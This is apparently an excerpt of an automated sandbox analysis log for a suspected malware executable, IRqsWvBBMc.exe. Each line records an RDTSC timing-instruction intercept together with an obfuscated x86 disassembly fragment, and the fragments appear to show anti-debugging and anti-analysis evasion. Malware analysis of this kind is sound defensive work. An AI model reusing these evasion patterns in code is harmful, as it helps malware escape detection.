Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0339 second address: 4DA033D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA033D second address: 4DA0343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA0343 second address: 4DA03A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F4AE0E87EBEh 0x00000010 mov cx, A021h 0x00000014 pop ecx 0x00000015 jmp 00007F4AE0E87EC7h 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007F4AE0E87EC9h 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 movzx ecx, di 0x00000026 push eax 0x00000027 push edx 0x00000028 mov al, bl 0x0000002a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA03A1 second address: 4DA03B3 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 20AA29C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA03B3 second address: 4DA03B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA03B7 second address: 4DA03BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DA03BB second address: 4DA03C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0775 second address: 4DC0779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0779 second address: 4DC077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC077F second address: 4DC07DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4AE04F888Eh 0x00000011 adc ecx, 1AC52B68h 0x00000017 jmp 00007F4AE04F888Bh 0x0000001c popfd 0x0000001d mov ax, CD5Fh 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007F4AE04F888Eh 0x0000002d xor si, 7DC8h 0x00000032 jmp 00007F4AE04F888Bh 0x00000037 popfd 0x00000038 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC07DC second address: 4DC083D instructions: 0x00000000 rdtsc 0x00000002 call 00007F4AE0E87EC8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F4AE0E87EBBh 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 popad 0x00000013 push ecx 0x00000014 pushad 0x00000015 mov edx, esi 0x00000017 jmp 00007F4AE0E87EBCh 0x0000001c popad 0x0000001d mov dword ptr [esp], ecx 0x00000020 jmp 00007F4AE0E87EC0h 0x00000025 mov eax, dword ptr [774365FCh] 0x0000002a pushad 0x0000002b pushad 0x0000002c mov dx, cx 0x0000002f mov bx, cx 0x00000032 popad 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC083D second address: 4DC0862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4AE04F8899h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0862 second address: 4DC0868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0868 second address: 4DC086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC086C second address: 4DC090D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F4B5347AFA8h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4AE0E87EC5h 0x00000015 xor eax, 1A157C66h 0x0000001b jmp 00007F4AE0E87EC1h 0x00000020 popfd 0x00000021 push ecx 0x00000022 push ebx 0x00000023 pop eax 0x00000024 pop ebx 0x00000025 popad 0x00000026 mov ecx, eax 0x00000028 pushad 0x00000029 mov bx, si 0x0000002c pushfd 0x0000002d jmp 00007F4AE0E87EC0h 0x00000032 adc cx, 5738h 0x00000037 jmp 00007F4AE0E87EBBh 0x0000003c popfd 0x0000003d popad 0x0000003e xor eax, dword ptr [ebp+08h] 0x00000041 jmp 00007F4AE0E87EBFh 0x00000046 and ecx, 1Fh 0x00000049 pushad 0x0000004a pushad 0x0000004b movzx ecx, dx 0x0000004e mov bx, A162h 0x00000052 popad 0x00000053 mov esi, edx 0x00000055 popad 0x00000056 ror eax, cl 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F4AE0E87EC0h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC090D second address: 4DC091F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4AE04F888Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC091F second address: 4DC0940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c pushad 0x0000000d mov al, FFh 0x0000000f mov ecx, ebx 0x00000011 popad 0x00000012 retn 0004h 0x00000015 nop 0x00000016 mov esi, eax 0x00000018 lea eax, dword ptr [ebp-08h] 0x0000001b xor esi, dword ptr [001A2014h] 0x00000021 push eax 0x00000022 push eax 0x00000023 push eax 0x00000024 lea eax, dword ptr [ebp-10h] 0x00000027 push eax 0x00000028 call 00007F4AE5AE8800h 0x0000002d push FFFFFFFEh 0x0000002f pushad 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0940 second address: 4DC09CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F4AE04F8897h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop eax 0x0000000e jmp 00007F4AE04F888Fh 0x00000013 ret 0x00000014 nop 0x00000015 push eax 0x00000016 call 00007F4AE51591FFh 0x0000001b mov edi, edi 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F4AE04F8894h 0x00000024 adc esi, 316FFA48h 0x0000002a jmp 00007F4AE04F888Bh 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F4AE04F8898h 0x00000036 sbb ch, FFFFFFA8h 0x00000039 jmp 00007F4AE04F888Bh 0x0000003e popfd 0x0000003f popad 0x00000040 xchg eax, ebp 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 mov ecx, 787F8F31h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC09CC second address: 4DC0A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F4AE0E87EBDh 0x00000009 pushfd 0x0000000a jmp 00007F4AE0E87EC0h 0x0000000f jmp 00007F4AE0E87EC5h 0x00000014 popfd 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0A0C second address: 4DC0A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 373C59ACh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0A16 second address: 4DC0A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DC0A1C second address: 4DC0A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D70174 second address: 4D701D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4AE0E87EC1h 0x00000008 mov si, 7C57h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push ecx 0x00000012 jmp 00007F4AE0E87EBFh 0x00000017 pop ecx 0x00000018 mov edx, 5E62EF0Ch 0x0000001d popad 0x0000001e mov ebx, dword ptr [ebp+10h] 0x00000021 jmp 00007F4AE0E87EBBh 0x00000026 xchg eax, esi 0x00000027 jmp 00007F4AE0E87EC6h 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D701D1 second address: 4D701E1 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 1Bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, ebx 0x00000008 popad 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D701E1 second address: 4D701E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D701E5 second address: 4D701EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D701EB second address: 4D701F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D701F1 second address: 4D70248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4AE04F8895h 0x00000012 adc ax, 3756h 0x00000017 jmp 00007F4AE04F8891h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F4AE04F8898h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D70248 second address: 4D70257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D70257 second address: 4D7026F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4AE04F8894h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D7026F second address: 4D702C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4AE0E87EC3h 0x00000012 adc eax, 2C62734Eh 0x00000018 jmp 00007F4AE0E87EC9h 0x0000001d popfd 0x0000001e jmp 00007F4AE0E87EC0h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D702C0 second address: 4D702D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D702D6 second address: 4D702DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D702DC second address: 4D702F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4AE04F8899h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D702F9 second address: 4D702FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D702FD second address: 4D7033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F4AE04F888Dh 0x0000000f je 00007F4B52B36B87h 0x00000015 jmp 00007F4AE04F888Eh 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bx, 75D0h 0x00000028 mov di, 1EFCh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D7033B second address: 4D7039C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4B534C6190h 0x0000000f jmp 00007F4AE0E87EC0h 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 jmp 00007F4AE0E87EC0h 0x0000001c or edx, dword ptr [ebp+0Ch] 0x0000001f pushad 0x00000020 popad 0x00000021 test edx, 61000000h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F4AE0E87EC5h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D7039C second address: 4D703B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov ah, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F4B52B36B68h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D703B1 second address: 4D703B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D607E5 second address: 4D607E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D607E9 second address: 4D60800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4AE0E87EBDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60800 second address: 4D608E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8891h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4AE04F888Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F4AE04F8890h 0x00000016 and esp, FFFFFFF8h 0x00000019 pushad 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F4AE04F888Ch 0x00000021 add al, 00000068h 0x00000024 jmp 00007F4AE04F888Bh 0x00000029 popfd 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d pushad 0x0000002e push eax 0x0000002f pop edx 0x00000030 pushfd 0x00000031 jmp 00007F4AE04F8890h 0x00000036 and cx, 25C8h 0x0000003b jmp 00007F4AE04F888Bh 0x00000040 popfd 0x00000041 popad 0x00000042 popad 0x00000043 xchg eax, ebx 0x00000044 jmp 00007F4AE04F8896h 0x00000049 push eax 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007F4AE04F8891h 0x00000051 sbb si, 8D96h 0x00000056 jmp 00007F4AE04F8891h 0x0000005b popfd 0x0000005c mov cx, 8A07h 0x00000060 popad 0x00000061 xchg eax, ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F4AE04F8899h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D608E4 second address: 4D60928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 pushfd 0x00000006 jmp 00007F4AE0E87EC3h 0x0000000b sub eax, 7874842Eh 0x00000011 jmp 00007F4AE0E87EC9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edi 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60928 second address: 4D6092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D6092D second address: 4D60A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e mov eax, edi 0x00000010 popad 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 movsx ebx, cx 0x00000016 mov si, 4CDDh 0x0000001a popad 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f mov ax, 3A95h 0x00000023 push eax 0x00000024 pushfd 0x00000025 jmp 00007F4AE0E87EC1h 0x0000002a add ecx, 4771E726h 0x00000030 jmp 00007F4AE0E87EC1h 0x00000035 popfd 0x00000036 pop esi 0x00000037 popad 0x00000038 mov ebx, 00000000h 0x0000003d jmp 00007F4AE0E87EBCh 0x00000042 test esi, esi 0x00000044 jmp 00007F4AE0E87EC0h 0x00000049 je 00007F4B534CD897h 0x0000004f jmp 00007F4AE0E87EC0h 0x00000054 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e mov dx, 0740h 0x00000062 pushfd 0x00000063 jmp 00007F4AE0E87EC9h 0x00000068 adc esi, 60509346h 0x0000006e jmp 00007F4AE0E87EC1h 0x00000073 popfd 0x00000074 popad 0x00000075 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60A04 second address: 4D60A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60A0A second address: 4D60A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60A0E second address: 4D60AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4AE04F8895h 0x00000011 jmp 00007F4AE04F888Bh 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007F4AE04F8898h 0x0000001d adc esi, 49E52D78h 0x00000023 jmp 00007F4AE04F888Bh 0x00000028 popfd 0x00000029 popad 0x0000002a je 00007F4B52B3E1C2h 0x00000030 pushad 0x00000031 movzx esi, dx 0x00000034 mov cl, bl 0x00000036 popad 0x00000037 test byte ptr [77436968h], 00000002h 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F4AE04F8896h 0x00000045 xor ch, 00000008h 0x00000048 jmp 00007F4AE04F888Bh 0x0000004d popfd 0x0000004e push eax 0x0000004f push edx 0x00000050 mov eax, 33C7E195h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60AA9 second address: 4D60AF7 instructions: 0x00000000 rdtsc 0x00000002 call 00007F4AE0E87EC2h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007F4B534CD7ABh 0x00000011 jmp 00007F4AE0E87EC1h 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4AE0E87EC8h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60AF7 second address: 4D60AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60AFB second address: 4D60B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60B01 second address: 4D60B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4AE04F8897h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60B2D second address: 4D60B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, B47Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60B36 second address: 4D60B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov al, FDh 0x0000000b pushfd 0x0000000c jmp 00007F4AE04F8899h 0x00000011 sbb si, B7A6h 0x00000016 jmp 00007F4AE04F8891h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4AE04F8898h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60B90 second address: 4D60B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D60B96 second address: 4D60BED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 mov ah, ABh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esp 0x0000000c jmp 00007F4AE04F8890h 0x00000011 mov dword ptr [esp], ebx 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 pushfd 0x00000018 jmp 00007F4AE04F888Ah 0x0000001d xor cl, 00000008h 0x00000020 jmp 00007F4AE04F888Bh 0x00000025 popfd 0x00000026 popad 0x00000027 push dword ptr [ebp+14h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F4AE04F8895h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D70CCC second address: 4D70CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D70CD2 second address: 4D70CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D70CD6 second address: 4D70CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D70CDA second address: 4D70CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ebx 0x0000000e mov cl, CCh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D70CEB second address: 4D70CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4AE0E87EBFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4D70A8D second address: 4D70AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushfd 0x00000008 jmp 00007F4AE04F8890h 0x0000000d sub cl, FFFFFFE8h 0x00000010 jmp 00007F4AE04F888Bh 0x00000015 popfd 0x00000016 mov dx, si 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F4AE04F8892h 0x00000020 mov ebp, esp 0x00000022 jmp 00007F4AE04F8890h 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F4AE04F8897h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4DF065D second address: 4DF0679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4AE0E87EC8h 0x00000009 rdtsc
